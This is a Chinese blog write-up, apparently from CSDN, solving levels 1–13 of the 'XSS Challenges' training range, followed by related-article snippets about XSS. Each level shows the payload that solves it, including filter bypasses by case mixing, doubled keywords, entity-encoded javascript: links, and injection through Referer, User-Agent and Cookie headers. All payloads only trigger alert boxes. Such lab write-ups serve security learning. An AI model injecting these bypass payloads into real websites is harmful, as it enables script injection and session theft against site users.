XSS入门 XSS Challenges

已于 2023-09-09 14:48:45 修改
阅读量343 收藏
点赞数 1
分类专栏: 靶场 文章标签: xss 安全
于 2023-09-09 14:24:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cgjil/article/details/132773844
版权
文章详细描述了XSS攻击中不同类型的注入手法,包括双引号、单引号、大小写转换、双写、编码等,以及如何利用伪协议、type属性、referer和user-agent进行绕过。同时,提到了防御措施如过滤和编码处理。
摘要由CSDN通过智能技术生成

level1(直接注入)

<script>alert('xss')</script>

image-20230825114847371

在这里插入图片描述

level2(双引号闭合标签)

测试
<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>

在这里插入图片描述
在这里插入图片描述

发现<>"被转换,构造新的语句
"><script>alert(/xss/)</script>

在这里插入图片描述

level3(单引号闭合标签+html事件)

测试
<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>

在这里插入图片描述

在这里插入图片描述

存在单引号,增加新的事件,构造新的语句:
'onmouseover='alert(/xss/)'

在这里插入图片描述

level4(双引号闭合标签+html事件)

测试
<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>

在这里插入图片描述
在这里插入图片描述

只有双引号,没有被转换,构造新的语句:
"onmouseover='alert(/xss/)'

在这里插入图片描述

level5(双引号闭合标签+伪协议)

测试
<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>

在这里插入图片描述

对ScRiPt和on有过滤,不能使用事件,可以使用a标签
"><a href="javascript:alert(/xss/)">click me</a>

在这里插入图片描述

level6(大小写转换)

测试
<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>

在这里插入图片描述

尝试过后,修改语句:
"><a hRef="javascript:alert(/xss/)">click me</a>

在这里插入图片描述

level7(双写)

测试
<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>

在这里插入图片描述

双写;修改语句:
"><scrscriptipt>alert(/xss/)</scrscriptipt>

在这里插入图片描述

level8(编码)

测试
<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>

在这里插入图片描述

可以看出大小写,双引号,也过滤了,前面关,用过的也都不起作用。
看到有个a标签,我们可以考虑伪协议 + 字符编码。
payload:javascript:alert(/xss/)

在这里插入图片描述

对r、i进行编码:
javasc&#x72;&#x69;pt:alert(/xss/)

在这里插入图片描述

level9(http://)

测试
<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>

在这里插入图片描述

javasc&#x72;&#x69;pt:alert('xsshttp://')

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

level10(type=“text”)

测试
<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>

在这里插入图片描述

其类型为hidden,则需要重新上传,type="text",通过尝试,t_sort能够在页面显示
t_link
t_history
t_sort
t_sort=1" type="text"

在这里插入图片描述

"onmouseover='alert(/xss/)' type="text"

在这里插入图片描述

level11(referer)

查看页面代码和源码,发现可以通过referer注入命令

在这里插入图片描述

在这里插入图片描述

hackbar获取url,选择referer注入
click me!" type="button" onclick="alert(/xss/)

在这里插入图片描述

在这里插入图片描述

level12(user-agent)

查看页面代码和源码,发现可以通过user-agent注入命令

在这里插入图片描述

在这里插入图片描述

hackbar获取url,选择user-agent注入
click me!" type="button" onclick="alert(/xss/)

在这里插入图片描述

在这里插入图片描述

level13(cookie)

查看页面代码和源码,发现可以通过cookie注入命令

在这里插入图片描述

在这里插入图片描述

hackbar获取url,选择cookie注入
user=click me!" type="button" onclick="alert(/xss/)

在这里插入图片描述

在这里插入图片描述

cgjil
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
学习网站1
08-08
同时,Firing Range、XSS ChallengesXSS Game提供了更多的训练环境,让你可以通过解决实际问题来增强对XSS防御的理解。 SQL注入则是另一种常见的Web应用漏洞,攻击者通过输入恶意的SQL语句,欺骗服务器执行非预期...
Web安全XSS
VN520的博客
01-15 811
XSS: (Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的. 比如获取用户的Cookie,导航到恶意网站,携带木马等。
XSS
千寻瀑
03-20 134
XSS跨站脚本漏洞原理常见利用方法使用场景常见XSS漏洞类型漏洞利用1、存储型2、反射型2、DOM型xsser 原理 hacker在服务器端插入恶意代码,在客户端向服务器发起请求后,将恶意代码返回给客户端 常见利用方法 盗取Cookie 重定向 使用场景 常见XSS漏洞类型 漏洞利用 爬网 变量注入:随意提交 当提交内容被原样返回:可能存在XSS 1、存储型 2、反射型 环境:metasploitable2(dvwa)、kali 步骤: 随意输入,结果返回相
Java实现XSS防御
宏微的博客
07-25 2万+
XSS概述跨站脚本攻击(Cross Site Scripting)
XSS注入测试
u012114090的博客
07-16 4万+
XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.  比如获取用户的Cookie,导航到恶意网站,携带木马等。作为测试人员,需要了解XSS的原理,攻击场景,如何修复。 才能有效的防止XSS的发生。   XSS ...
web安全(一)——XSS
远走的兔子博客
05-06 2165
作为一名前端小白,之前并没有很关心过这个问题。对于web安全的认知只有记忆中大三网络安全课程中的零星点点。后来经历了几场面试,竟然都问到web安全相关的问题,遂查阅了一些资料,了解了相关知识。在此,记录下自己的一些理解和整理的相关资料。希望可以和大家分享,若有不正确之处,望指出。XSS又称为CSS(Cross Site Script),中文名称为跨站点脚本攻击。按照英文全称的缩写应该为CSS,但是...
challenges
03-20
4. **Web安全**:这部分挑战可能包括SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)等常见漏洞的利用。参赛者需要了解Web应用的工作原理,并能编写Python脚本来模拟攻击。 5. **文件解析**:参赛者可能需要解析...
Hackademic Challenges-开源
07-14
通过一系列精心设计的挑战,用户可以学习到各种常见的Web应用安全漏洞,如SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)等。这些挑战模拟了真实的攻击场景,让用户亲身体验攻击者的思维,从而更好地理解和防御...
CTF-Challenges
06-29
6. **安全实践**:在处理用户输入时,应遵循安全原则,比如使用预处理语句防止SQL注入,用`htmlspecialchars()`防范XSS攻击,以及确保正确过滤和验证输入数据。 7. **会话管理**:为了实现用户认证,需要了解如何...
My-CTF-Challenges
05-09
【标题】"My-CTF-Challenges"是一个个人创建的网络安全挑战集合,主要涉及Web安全领域,特别是网页和杂项类的题目。这个压缩包包含了作者设计的一系列CTF(Capture The Flag)挑战,旨在帮助学习者提升在网络安全,...
XSS漏洞
黄先生的博客
03-01 2万+
XSS是web安全中最为常见的漏洞,XSS全称是Cross Site Script。XSS攻击通常指黑客通过“HTML注入”篡改了网页,插入了恶意脚本,从而控制用户浏览的一种攻击。 这里的跨站访问,可以是从正常的网站跨到黑客的服务器,也可以是黑客的服务器跨到正常的网站。 XSS漏洞经常出现在需要用户输入的地方,这些地方一旦对输入不进行处理,黑客就可以进行HTML注入,进而篡改网页。 例如:页...
xss
本杰明的博客
06-13 1860
xss攻击是什么跨站脚本攻击(Cross-Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,所以将跨站脚本攻击缩写为XSSxss是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。危害 盗用cookie,获取敏感
常见的Web漏洞——XSS
江左盟的博客
07-08 2万+
目录 XSS简介 XSS原理及分类 反射型XSS 存储型XSS 基于DOM的XSS XSSer的使用 至少有一个的参数: 可选的参数: 检查选项 选择攻击向量 绕过防火墙选项 绕过器选项 特殊技术 最后注入选项 特殊最后注入选项 报告导出 XSSer演示 BeEF-XSS 漏洞的防范 总结 XSS简介 XSS是跨站脚本攻击(Cross Site Scri...
xss基础知识
土拨鼠挖洞中的博客
10-03 5339
  XSS 概述 指攻击者利用网站程序对用户的输入输出过滤不足,导致恶意代码在页面执行,对受害者造成cookie资料窃取、会话劫持、钓鱼欺骗等危害;     XSS危害 1.网络钓鱼,盗取各类用户的账号,如机器登录帐号、用户网银帐号、各类管理员帐号; 2.窃取用户Cookie,获取用户隐私,或者利用用户身份进一步执行操作 3.劫持用户(浏览器)会话,从而执行任意操作,例如进行非法转账、...
XSS攻击及防御
热门推荐
寻道
11-29 20万+
本文来自:高爽|Coder,原文地址:http://blog.csdn.net/ghsau/article/details/17027893,转载请注明。 XSS又称CSS,全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的H...
XSS详解(译)
yifeng_peng的博客
01-10 5568
一、XSS 概述 什么是XSS? Cross-site scripting(XSS)是一种能够在他人浏览器中执行恶意 JavaScript代码的代码注入攻击。 攻击者不需要直接接触受害者。他可以直接利用受害者访问的网站的漏洞来让恶意代码在其浏览器中执行。对于受害者的浏览器来说,恶意的 JavaScript 代码表现的就像是网站合法的一部分,而网站的行为也完全不像是攻击者的帮凶。 恶意的 JavaS...
CTFHub技能树web——XSS——DOM反射
最新发布
qq_48368964的博客
08-02 441
创建一个项目 把src粘过来 在第一个输入框中 再将返回回来的url 复制粘贴到第二个 输入框中。根据框里的内容 直接右键查看网页源代码 看到 了其闭合方式。然后去网页测试一下alert(1)反射。看到 确实存在 去xssaq.cn。
自动化XSS挖掘工具XSSer入门详解
在第一节自动化XSS挖掘的介绍中,我们将深入探讨XSSer这款强大的Web应用程序漏洞挖掘工具。XSS(Cross-Site Scripting)是一种常见的Web安全漏洞,它允许攻击者通过恶意注入脚本在用户的浏览器上执行,从而窃取敏感...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值